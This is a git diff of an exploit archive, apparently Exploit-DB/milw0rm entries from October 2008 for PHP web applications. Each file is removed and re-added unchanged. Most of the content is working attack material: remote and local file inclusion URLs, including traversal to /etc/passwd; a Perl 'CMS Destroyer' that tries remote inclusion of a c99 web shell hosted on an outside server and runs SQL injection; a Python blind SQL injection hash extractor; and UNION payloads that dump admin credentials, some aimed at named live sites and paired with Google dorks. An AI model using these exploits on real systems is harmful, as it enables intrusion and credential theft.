-	require($CFG['CDIR'].'/global.php'); 
-	require($CFG['CDIR'].'/sql.php');
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode]
-
-
-===========================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ www.mainhack.com ]
-       VOP Crew [ Vaksin13 OoN_BoY Paman ]
-       H312Y yooogy mousekill }^-^{ k1tk4t
-       skulmatic olibekas ulga Cungkee str0ke
-
-        
-===========================================================================================
-
-# milw0rm.com [2008-10-19]
+===========================================================================================
+
+
+  [o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability
+
+       Software : Fast CLick SQL Lite version 1.1.7
+       Vendor   : http://www.ftrsoft.com/
+       Download : http://www.ftrsoft.com/downloads.html
+       Author   : NoGe
+       Contact  : noge[at]mainhack[dot]com
+
+
+===========================================================================================
+
+
+  [o] Vulnerable file
+
+       common/init.php
+
+	require($CFG['CDIR'].'/global.php'); 
+	require($CFG['CDIR'].'/sql.php');
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode]
+
+
+===========================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ www.mainhack.com ]
+       VOP Crew [ Vaksin13 OoN_BoY Paman ]
+       H312Y yooogy mousekill }^-^{ k1tk4t
+       skulmatic olibekas ulga Cungkee str0ke
+
+        
+===========================================================================================
+
+# milw0rm.com [2008-10-19]
diff --git a/platforms/php/webapps/6788.txt b/platforms/php/webapps/6788.txt
index d26e75c68..3472080c4 100755
--- a/platforms/php/webapps/6788.txt
+++ b/platforms/php/webapps/6788.txt
@@ -1,32 +1,32 @@
-[o]------------------------------------------------------------------------------------[x]
- |  Local File Include Vulnerability                                                    |
-[o]------------------------------------------------------------------------------------[o]
- |  Software : yappa-ng Version 2.3.2                                                   |
- |  Vendor   : http://www.zirkon.at/zirkon/scripts/yappa-ng/yappa-ng_main_eng.html      |
- |  Date     : 19 October 2008                                                          |
- |  Author   : Vrs-hCk                                                                  |
- |  Contact  : d00r[at]telkom[dot]net                                                   |
-[o]------------------------------------------------------------------------------------[o]
-
-[»] Google Dork
-
-    "Powered by yappa-ng 2.3.2"
-
-[»] Exploit
-
-    http://[site]/[yappa-ng-path]/index.php?album=[LFI]%00
-
-[»] Proof of Concept
-
-    http://www.zirkon.at/yappa-ng_demo/index.php?album=[LFI]%00
-
-[o]------------------------------------------------------------------------------------[x]
- |  Greetz                                                                              |
-[o]------------------------------------------------------------------------------------[o]
- |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
- |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, NgL, ScanneD, }^-^{, eminem,             |
- |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, dkk ...                  |
- |  c0li.m0de.0n & BeHave oR BeGone !!!                                                 |
-[o]------------------------------------------------------------------------------------[o]
-
-# milw0rm.com [2008-10-19]
+[o]------------------------------------------------------------------------------------[x]
+ |  Local File Include Vulnerability                                                    |
+[o]------------------------------------------------------------------------------------[o]
+ |  Software : yappa-ng Version 2.3.2                                                   |
+ |  Vendor   : http://www.zirkon.at/zirkon/scripts/yappa-ng/yappa-ng_main_eng.html      |
+ |  Date     : 19 October 2008                                                          |
+ |  Author   : Vrs-hCk                                                                  |
+ |  Contact  : d00r[at]telkom[dot]net                                                   |
+[o]------------------------------------------------------------------------------------[o]
+
+[»] Google Dork
+
+    "Powered by yappa-ng 2.3.2"
+
+[»] Exploit
+
+    http://[site]/[yappa-ng-path]/index.php?album=[LFI]%00
+
+[»] Proof of Concept
+
+    http://www.zirkon.at/yappa-ng_demo/index.php?album=[LFI]%00
+
+[o]------------------------------------------------------------------------------------[x]
+ |  Greetz                                                                              |
+[o]------------------------------------------------------------------------------------[o]
+ |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
+ |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, NgL, ScanneD, }^-^{, eminem,             |
+ |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, dkk ...                  |
+ |  c0li.m0de.0n & BeHave oR BeGone !!!                                                 |
+[o]------------------------------------------------------------------------------------[o]
+
+# milw0rm.com [2008-10-19]
diff --git a/platforms/php/webapps/6789.pl b/platforms/php/webapps/6789.pl
index ca2928d09..eabdb352f 100755
--- a/platforms/php/webapps/6789.pl
+++ b/platforms/php/webapps/6789.pl
@@ -1,119 +1,119 @@
-#!/usr/bin/perl
-
-#Vivvo CMS Destroyer
-#uxmal666@gmail.com
-#By Xianur0
-#-------------CREDITS-------------
-#http://milw0rm.com/exploits/4192
-#http://milw0rm.com/exploits/3326
-#http://milw0rm.com/exploits/2339
-#http://milw0rm.com/exploits/2337
-#-------------/CREDITS-------------
-
-print "\n                           Vivvo CMS Destroyer By Xianur0\n";
-
-#-----------CONFIG----------
-$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
-$textshell = 'C99Shell v.';
-#----------/CONFIG----------
-  use LWP::UserAgent;
-  use Switch;
-  my $path = $ARGV[0];
-  $path = shift || &uso;
-sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
-  $ua = LWP::UserAgent->new;
-  $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
-  $req = HTTP::Request->new(GET => $path."/feed.php?output_type=rss");
-  $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
-  $res = $ua->request($req);
-  if ($res->is_success && $res->content =~ "generator") {
-&parser($res->content);
-  } else {
-  $req = HTTP::Request->new(GET => $path."/index.php?feed");
-  $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
-  $res = $ua->request($req);
-  if ($res->is_success && $res->content =~ "generator") {
-&parser($res->content);
-  }
-    else { print "\nError getting data!\n"; exit;}
-  }
-
-&backups;
-
-
-sub parser {
-my @datos = split('Vivvo CMS ', $_[0]);
-my @version = split('', $datos[1]);
-$version = $version[0];
-if($version[0] == "") {
-my @datos = split('', $datos[1]);
-$version = $version[0];
-}
-print "Version: ".$version."\n";
-if($version < "4") { print "Outdated version of Vivvo CMS!\n"; &desactualizada($version);}
-}
-
-sub backups {
-  $req = HTTP::Request->new(GET => "$path/backup");
-  $req->header('Accept' => 'text/xml');
-  $res = $ua->request($req);
-  if ($res->is_success) {
-if($res->content =~ "Index of /backup") {
-print "\n              Backups:\n";
-my @datos = split('', $archivos);
-if($archivo[0] !~ /\?/){print $archivo[0]."\n"; }
-}
-print "\nUnprotected Directory: $path/backup\n";
-  }
-}
-}
-
-sub rfi {
-$vuln = $_[0];
-  $req = HTTP::Request->new(GET => "$path/$vuln=$SHELL?");
-  $req->header('Accept' => 'text/xml');
-  $res = $ua->request($req);
-  if ($res->is_success) {
-if($res->content =~ $textshell) {
-print "RFI Detected!: $path/$vuln=$SHELL?";
-  }
-}}
-
-sub sql {
-$exploit = "pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=1";
-  $req = HTTP::Request->new(GET => "$path/$exploit");
-  $req->header('Accept' => 'text/xml');
-  $res = $ua->request($req);
-  if ($res->is_success) {
-print "SQL Injection Generated: $path$exploit";
-}
-}
-
-sub blind {
-for($i=1; $i<32;$i++) {
-for($o=30; $o<102;$o++) {
-$injection = "$path/index.php?category=/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),".$i.",1))=".$o;
-  $req = HTTP::Request->new(GET => $injection);
-  $req->header('Accept' => 'text/xml');
-  $res = $ua->request($req);
-  if ($res->is_success) {
-if($res->content != "") {
-print "Blind Done Correctly!: $injection";
-  }
-}
-}}}
-
-sub desactualizada {
-$version = $_[0];
-  switch ($version) {
-    case "3.4"    { print "Blind SQL Injection trying ....\n"; &blind; print "Intentando RFI....\n"; &rfi('include/db_conn.php?root');}
-    case "3.2"    { print "RFI trying ....\n"; &rfi('index.php?classified_path'); print "SQL Injection....\n"; &sql;}
-        else { print "There is no registration for this Exploit Version! : (\n";}
-    }
-}
-
-# milw0rm.com [2008-10-19]
+#!/usr/bin/perl
+
+#Vivvo CMS Destroyer
+#uxmal666@gmail.com
+#By Xianur0
+#-------------CREDITS-------------
+#http://milw0rm.com/exploits/4192
+#http://milw0rm.com/exploits/3326
+#http://milw0rm.com/exploits/2339
+#http://milw0rm.com/exploits/2337
+#-------------/CREDITS-------------
+
+print "\n                           Vivvo CMS Destroyer By Xianur0\n";
+
+#-----------CONFIG----------
+$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
+$textshell = 'C99Shell v.';
+#----------/CONFIG----------
+  use LWP::UserAgent;
+  use Switch;
+  my $path = $ARGV[0];
+  $path = shift || &uso;
+sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
+  $ua = LWP::UserAgent->new;
+  $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
+  $req = HTTP::Request->new(GET => $path."/feed.php?output_type=rss");
+  $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
+  $res = $ua->request($req);
+  if ($res->is_success && $res->content =~ "generator") {
+&parser($res->content);
+  } else {
+  $req = HTTP::Request->new(GET => $path."/index.php?feed");
+  $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
+  $res = $ua->request($req);
+  if ($res->is_success && $res->content =~ "generator") {
+&parser($res->content);
+  }
+    else { print "\nError getting data!\n"; exit;}
+  }
+
+&backups;
+
+
+sub parser {
+my @datos = split('Vivvo CMS ', $_[0]);
+my @version = split('', $datos[1]);
+$version = $version[0];
+if($version[0] == "") {
+my @datos = split('', $datos[1]);
+$version = $version[0];
+}
+print "Version: ".$version."\n";
+if($version < "4") { print "Outdated version of Vivvo CMS!\n"; &desactualizada($version);}
+}
+
+sub backups {
+  $req = HTTP::Request->new(GET => "$path/backup");
+  $req->header('Accept' => 'text/xml');
+  $res = $ua->request($req);
+  if ($res->is_success) {
+if($res->content =~ "Index of /backup") {
+print "\n              Backups:\n";
+my @datos = split('', $archivos);
+if($archivo[0] !~ /\?/){print $archivo[0]."\n"; }
+}
+print "\nUnprotected Directory: $path/backup\n";
+  }
+}
+}
+
+sub rfi {
+$vuln = $_[0];
+  $req = HTTP::Request->new(GET => "$path/$vuln=$SHELL?");
+  $req->header('Accept' => 'text/xml');
+  $res = $ua->request($req);
+  if ($res->is_success) {
+if($res->content =~ $textshell) {
+print "RFI Detected!: $path/$vuln=$SHELL?";
+  }
+}}
+
+sub sql {
+$exploit = "pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=1";
+  $req = HTTP::Request->new(GET => "$path/$exploit");
+  $req->header('Accept' => 'text/xml');
+  $res = $ua->request($req);
+  if ($res->is_success) {
+print "SQL Injection Generated: $path$exploit";
+}
+}
+
+sub blind {
+for($i=1; $i<32;$i++) {
+for($o=30; $o<102;$o++) {
+$injection = "$path/index.php?category=/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),".$i.",1))=".$o;
+  $req = HTTP::Request->new(GET => $injection);
+  $req->header('Accept' => 'text/xml');
+  $res = $ua->request($req);
+  if ($res->is_success) {
+if($res->content != "") {
+print "Blind Done Correctly!: $injection";
+  }
+}
+}}}
+
+sub desactualizada {
+$version = $_[0];
+  switch ($version) {
+    case "3.4"    { print "Blind SQL Injection trying ....\n"; &blind; print "Intentando RFI....\n"; &rfi('include/db_conn.php?root');}
+    case "3.2"    { print "RFI trying ....\n"; &rfi('index.php?classified_path'); print "SQL Injection....\n"; &sql;}
+        else { print "There is no registration for this Exploit Version! : (\n";}
+    }
+}
+
+# milw0rm.com [2008-10-19]
diff --git a/platforms/php/webapps/6790.py b/platforms/php/webapps/6790.py
index 21f3193fc..afa718a76 100755
--- a/platforms/php/webapps/6790.py
+++ b/platforms/php/webapps/6790.py
@@ -1,54 +1,54 @@
-import sys, urllib2, re
-
-print "\n "
-print "                          \\#'#/                        "
-print "                          (-.-)                         "
-print "  -------------------oOO---(_)---OOo--------------------"
-print "  |   rGallery 1.09 (+-) Exploit by Five-Three-Nine    |"
-print "  |  Using Blind SQL Injection in 'itemID' of rGallery |"
-print "  |                                                    |"
-print "  |                Greets and Shouts to:               |"
-print "  | tmh, n00bor, activebeta, Ghost, Saufkumpel, Altair |"  
-print "  | crusader727, Nemo, Loader007, J0hn.X3r, sNiper109  |"                                      
-print "  ------------------------------------------------------\n"
-
-
-if len(sys.argv) != 5:
-	print "\nUsage: ./rGallery.py    "
-	print "Ex: ./rGallery.py 1 bb1_users 19 http://example.com\n"
-	sys.exit(1)
-
-UserID = sys.argv[1]
-Prefix = sys.argv[2]
-ImageID = sys.argv[3]
-Host = sys.argv[4]
-
-Res = [48,49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102]
-MD5 = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32]
-Hash = ""
-
-UserID = int(UserID)
-UserID -= 1
-UserID = str(UserID)
-
-for MD5Count in range(32):
-	for ResCount in range(16):
-		try:
-			source = urllib2.urlopen(Host +"/index.php?page=RGalleryImageWrapper&itemID=" + ImageID +"%20and%20ascii(substring((SELECT%20password%20from%20" + Prefix +"%20limit%20"+ UserID + ",1)," + str(MD5Count + 1) + ",1))="+ str(Res[ResCount])).read()
-			
-			print "[+] Character " + str(MD5Count + 1) +  " found! " + str(Res[ResCount])
-			MD5[MD5Count] = Res[ResCount]
-			break
-		except(urllib2.URLError):
-			continue 
-		except(urllib2.HTTPError):
-			print "[+] Error: Can't load the Site"
-			sys.exit(1)
-
-
-for i in MD5:
-	Hash = Hash + str(chr(i))
-	
-print "\n[+] Hash: " + Hash
-
-# milw0rm.com [2008-10-20]
+import sys, urllib2, re
+
+print "\n "
+print "                          \\#'#/                        "
+print "                          (-.-)                         "
+print "  -------------------oOO---(_)---OOo--------------------"
+print "  |   rGallery 1.09 (+-) Exploit by Five-Three-Nine    |"
+print "  |  Using Blind SQL Injection in 'itemID' of rGallery |"
+print "  |                                                    |"
+print "  |                Greets and Shouts to:               |"
+print "  | tmh, n00bor, activebeta, Ghost, Saufkumpel, Altair |"  
+print "  | crusader727, Nemo, Loader007, J0hn.X3r, sNiper109  |"                                      
+print "  ------------------------------------------------------\n"
+
+
+if len(sys.argv) != 5:
+	print "\nUsage: ./rGallery.py    "
+	print "Ex: ./rGallery.py 1 bb1_users 19 http://example.com\n"
+	sys.exit(1)
+
+UserID = sys.argv[1]
+Prefix = sys.argv[2]
+ImageID = sys.argv[3]
+Host = sys.argv[4]
+
+Res = [48,49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102]
+MD5 = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32]
+Hash = ""
+
+UserID = int(UserID)
+UserID -= 1
+UserID = str(UserID)
+
+for MD5Count in range(32):
+	for ResCount in range(16):
+		try:
+			source = urllib2.urlopen(Host +"/index.php?page=RGalleryImageWrapper&itemID=" + ImageID +"%20and%20ascii(substring((SELECT%20password%20from%20" + Prefix +"%20limit%20"+ UserID + ",1)," + str(MD5Count + 1) + ",1))="+ str(Res[ResCount])).read()
+			
+			print "[+] Character " + str(MD5Count + 1) +  " found! " + str(Res[ResCount])
+			MD5[MD5Count] = Res[ResCount]
+			break
+		except(urllib2.URLError):
+			continue 
+		except(urllib2.HTTPError):
+			print "[+] Error: Can't load the Site"
+			sys.exit(1)
+
+
+for i in MD5:
+	Hash = Hash + str(chr(i))
+	
+print "\n[+] Hash: " + Hash
+
+# milw0rm.com [2008-10-20]
diff --git a/platforms/php/webapps/6792.txt b/platforms/php/webapps/6792.txt
index c051f36d4..88244afea 100755
--- a/platforms/php/webapps/6792.txt
+++ b/platforms/php/webapps/6792.txt
@@ -1,37 +1,37 @@
-#############################################
-#Joomla com_ds-syndicate Sql-injetion vulnerability #
-#############################################
-#[~] Author :  boom3rang 
-#[~] HomePage: www.khg-crew.ws
-#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er.
-#[~] Kosova Hackers Group 
-
-#[!] Component_Name:  ds-syndicate
-#[!] Script_Name:  Joomla
-#[!] Google_Dork:  inurl:"com_ds-syndicate"
-#############################################
-
-
-#[~] Exp:           http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit]
-
-#[~] Exploit [1]:        1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users--    
-
-#[~] Exploit [2]:    
- 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--  
-
-#[!] Note:
-If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;).
-
-#[~] liveDemo: 
-http://www.esss.se/sv/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--
-
-ps. here in this liveDemo you need to download file  =feed1= .
-
-#############################################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-#############################################
-
-
-# milw0rm.com [2008-10-20]
+#############################################
+#Joomla com_ds-syndicate Sql-injetion vulnerability #
+#############################################
+#[~] Author :  boom3rang 
+#[~] HomePage: www.khg-crew.ws
+#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er.
+#[~] Kosova Hackers Group 
+
+#[!] Component_Name:  ds-syndicate
+#[!] Script_Name:  Joomla
+#[!] Google_Dork:  inurl:"com_ds-syndicate"
+#############################################
+
+
+#[~] Exp:           http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit]
+
+#[~] Exploit [1]:        1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users--    
+
+#[~] Exploit [2]:    
+ 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--  
+
+#[!] Note:
+If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;).
+
+#[~] liveDemo: 
+http://www.esss.se/sv/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--
+
+ps. here in this liveDemo you need to download file  =feed1= .
+
+#############################################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+#############################################
+
+
+# milw0rm.com [2008-10-20]
diff --git a/platforms/php/webapps/6795.txt b/platforms/php/webapps/6795.txt
index 0cb870bde..72250238a 100755
--- a/platforms/php/webapps/6795.txt
+++ b/platforms/php/webapps/6795.txt
@@ -1,24 +1,24 @@
-##########################################
-#
-# XOOPS Module:  makale
-#
-#
-##########################################
-#
-##AUTHOR : EcHoLL
-####HOME : http://www.warezturk.org
-#
-####MAÄ°L : echoll1983@hotmail.com
-#
-###########################################
-#
-# DORKS 1 : dork: /modules/makale/
-###########################################
- 
-target: scriptpage.com/modules/makale/makale.php?id= [sql Code]
- 
-Sql code: 15+UNION+SELECT+0,1,2,3,uname,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19+from+xoops_users--
- 
-live link: http://stu.inonu.edu.tr/~usit/modules/makale/makale.php?id=10+UNION+SELECT+0,1,2,3,database(),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19--
-
-# milw0rm.com [2008-10-20]
+##########################################
+#
+# XOOPS Module:  makale
+#
+#
+##########################################
+#
+##AUTHOR : EcHoLL
+####HOME : http://www.warezturk.org
+#
+####MAÄ°L : echoll1983@hotmail.com
+#
+###########################################
+#
+# DORKS 1 : dork: /modules/makale/
+###########################################
+ 
+target: scriptpage.com/modules/makale/makale.php?id= [sql Code]
+ 
+Sql code: 15+UNION+SELECT+0,1,2,3,uname,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19+from+xoops_users--
+ 
+live link: http://stu.inonu.edu.tr/~usit/modules/makale/makale.php?id=10+UNION+SELECT+0,1,2,3,database(),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19--
+
+# milw0rm.com [2008-10-20]
diff --git a/platforms/php/webapps/6796.txt b/platforms/php/webapps/6796.txt
index a624b4374..12de6fcf6 100755
--- a/platforms/php/webapps/6796.txt
+++ b/platforms/php/webapps/6796.txt
@@ -1,28 +1,28 @@
-/*
-   
-   Limbo CMS (Private Messaging Component) Remote SQL Injection Vulnerability
-   --------------------------------------------------------------------------
-   StAkeR[at]hotmail[dot]it
-   http://www.limboportal.com/index.php/option/downloads/task/download/id/108
-   --------------------------------------------------------------------------
-
-   com_privmsg/open.php
-   
-   31. if (isset($_GET['status']))
-   32. {
-   33. 	  header('Location:index.php?option=pms&page=open&id='.$_GET['id'].'');
-   34. }
-   35. 
-   36. $openrow= $conn->GetRow("SELECT * FROM #__pms WHERE id='$_GET[id]' AND username='$my->username'");
-   37.
-   
-   
-   - index.php?option=pms&page=open&id='1+union+all+select+password,username+from+[prefix_users]+where+id=1/*
-   
-   (Syntax Error) Change number of columns (Ex: 0,0,0,username,password) 
-   
-   
-
-*/
-
-# milw0rm.com [2008-10-21]
+/*
+   
+   Limbo CMS (Private Messaging Component) Remote SQL Injection Vulnerability
+   --------------------------------------------------------------------------
+   StAkeR[at]hotmail[dot]it
+   http://www.limboportal.com/index.php/option/downloads/task/download/id/108
+   --------------------------------------------------------------------------
+
+   com_privmsg/open.php
+   
+   31. if (isset($_GET['status']))
+   32. {
+   33. 	  header('Location:index.php?option=pms&page=open&id='.$_GET['id'].'');
+   34. }
+   35. 
+   36. $openrow= $conn->GetRow("SELECT * FROM #__pms WHERE id='$_GET[id]' AND username='$my->username'");
+   37.
+   
+   
+   - index.php?option=pms&page=open&id='1+union+all+select+password,username+from+[prefix_users]+where+id=1/*
+   
+   (Syntax Error) Change number of columns (Ex: 0,0,0,username,password) 
+   
+   
+
+*/
+
+# milw0rm.com [2008-10-21]
diff --git a/platforms/php/webapps/6797.txt b/platforms/php/webapps/6797.txt
index cdaa77f8d..0cecc7633 100755
--- a/platforms/php/webapps/6797.txt
+++ b/platforms/php/webapps/6797.txt
@@ -1,53 +1,53 @@
-# LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilies
-# url: http://www.publicwarehouse.co.uk/php_scripts/lightblog.php
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-
-vuln file: view_member.php
-vuln code:
-8: if(isset($_GET['username']) and file_exists("./accounts/".$_GET['username'].".php")){
-x: ...
-24: include("./accounts/{$username_get}.php");
-39: }
-
-PoC: GET view_member.php?username=[file]%00
-ExP: GET view_member.php?username=../../../../../../../../../../etc/passwd%00
-
----
-
-vuln file: login.php
-vuln code:
-18: include("./accounts/".$_POST['username_post'].".php");
-
-PoC: POST login.php?username_post=[file]%00
-ExP: POST login.php?username_post=../../../../../../../../../../etc/passwd%00
-
----
-
-vuln file: check_user.php
-vuln code: 
-6: if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){
-
-   $username_cookie = $_COOKIE['Lightblog_username'];
-   $password_cookie = $_COOKIE['Lightblog_password'];
-
-   if(file_exists("./accounts/{$username_cookie}.php")){
-13:include("./accounts/{$username_cookie}.php");
-
-PoC: javascript:document.cookie = "Lightblog_username=[file]%00; path=/"; document.cookie = "Lightblog_password=JosS;
-     path=/";
-ExP: javascript:document.cookie = "Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/";
-     document.cookie = "Lightblog_password=JosS; path=/";
-
----
-
-and more ...
-hack0wn :D
-
-# milw0rm.com [2008-10-21]
+# LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilies
+# url: http://www.publicwarehouse.co.uk/php_scripts/lightblog.php
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+vuln file: view_member.php
+vuln code:
+8: if(isset($_GET['username']) and file_exists("./accounts/".$_GET['username'].".php")){
+x: ...
+24: include("./accounts/{$username_get}.php");
+39: }
+
+PoC: GET view_member.php?username=[file]%00
+ExP: GET view_member.php?username=../../../../../../../../../../etc/passwd%00
+
+---
+
+vuln file: login.php
+vuln code:
+18: include("./accounts/".$_POST['username_post'].".php");
+
+PoC: POST login.php?username_post=[file]%00
+ExP: POST login.php?username_post=../../../../../../../../../../etc/passwd%00
+
+---
+
+vuln file: check_user.php
+vuln code: 
+6: if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){
+
+   $username_cookie = $_COOKIE['Lightblog_username'];
+   $password_cookie = $_COOKIE['Lightblog_password'];
+
+   if(file_exists("./accounts/{$username_cookie}.php")){
+13:include("./accounts/{$username_cookie}.php");
+
+PoC: javascript:document.cookie = "Lightblog_username=[file]%00; path=/"; document.cookie = "Lightblog_password=JosS;
+     path=/";
+ExP: javascript:document.cookie = "Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/";
+     document.cookie = "Lightblog_password=JosS; path=/";
+
+---
+
+and more ...
+hack0wn :D
+
+# milw0rm.com [2008-10-21]
diff --git a/platforms/php/webapps/6799.txt b/platforms/php/webapps/6799.txt
index 8b4f1afd3..69ac56dc2 100755
--- a/platforms/php/webapps/6799.txt
+++ b/platforms/php/webapps/6799.txt
@@ -1,48 +1,48 @@
-|___________________________________________________|
-|
-| ShopMaker v1.0 (product.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------    Hussin X  -------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|                                                                                                     |
-|
-| script : http://shop.maker.ir
-|
-| DorK   : "ShopMaker v1.0"
-|___________________________________________________|
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin--
-
-
-DemO :
-
-
-http://shop.maker.ir/shop/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin--
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi 
-
-# milw0rm.com [2008-10-21]
+|___________________________________________________|
+|
+| ShopMaker v1.0 (product.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------    Hussin X  -------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|                                                                                                     |
+|
+| script : http://shop.maker.ir
+|
+| DorK   : "ShopMaker v1.0"
+|___________________________________________________|
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin--
+
+
+DemO :
+
+
+http://shop.maker.ir/shop/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin--
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi 
+
+# milw0rm.com [2008-10-21]
diff --git a/platforms/php/webapps/6802.txt b/platforms/php/webapps/6802.txt
index c03518682..30cf2df25 100755
--- a/platforms/php/webapps/6802.txt
+++ b/platforms/php/webapps/6802.txt
@@ -1,45 +1,45 @@
-#############################################################################
-#							                    #
-#      Joomla Component Daily Message (id) SQL Injection Vulnerability      #
-#							                    #
-#############################################################################
-
-
-########################################
-
-[~] Vulnerability found by: H!tm@N
-[~] Contact: hitman[at]khg-crew[dot]ws
-[~] Site: www.khg-crew.ws
-[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
-
-########################################
-
-[~] ScriptName:    "Joomla"
-[~] Component:     "Daily Message (com_dailymessage)"  
-[~] Version:       "1.0.3 "
-[~] Date:          "10/4/2005 "
-[~] Author:        "Joseph LeBlanc"
-[~] Author E-mail: "contact@jlleblanc.com"
-[~] Author URL:    "www.jlleblanc.com"
-
-########################################
-
-[~] Exploit: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=[SQL]
-
